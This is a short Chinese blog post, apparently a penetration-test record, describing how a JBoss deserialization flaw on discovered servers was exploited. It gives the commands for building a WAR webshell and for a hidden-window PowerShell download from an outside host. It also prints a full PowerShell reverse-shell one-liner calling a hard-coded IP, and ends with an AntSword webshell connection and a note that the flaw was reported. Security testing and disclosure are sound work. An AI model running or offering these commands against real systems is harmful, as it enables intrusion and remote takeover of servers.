jboss实战记录

通过资产收集,搜索存在jboss中间件的服务器

利用java反序列化工具进行测试

发现存在jboss反序列化漏洞

步骤四:发现存在可以命令执行并且可以下载操作

 

步骤三:尝试GetShell..首先使用以下命令创建war后门...并使用FinalShell上传到服务器...

jar -cvf shell.war peak.jsp

步骤四:在云主机上开启HTTP服务并对外提供文件下载...并在攻击客户端使用PowerShell命令进行WebShell文件下载...

python2 -m SimpleHTTPServer 8080

执行命令

powershell.exe -ExecutionPolicy bypass -noprofile -windowstyle hidden (new-object system.net.webclient).downloadfile('http://laosec.cn:1234/shell.war','shell.war')

步骤五:在云服务器上使用NC监听1234端口并使用以下命令进行Shell反弹

 powershell -c "$client = New-Object Net.Sockets.TCPClient('121.40.248.82',1111);$stream = $client.GetStream(); [byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){; $data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback=(iex $data 2>&1 | Out-String );$sendata =$sendback+'PS >';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendata);$leng=$sendbyte.Length;$stream.Write($sendbyte,0,$leng);$stream.Flush()};$client.Close()"

步骤六:使用以下命令将上传的war文件移动到网站根目录下并在浏览器中进行访问...已经GetShell...

使用蚁剑连接

 到此没有再继续进行深入利用

提交漏洞


版权声明:本文为weixin_50815573原创文章,遵循CC 4.0 BY-SA版权协议,转载请附上原文出处链接和本声明。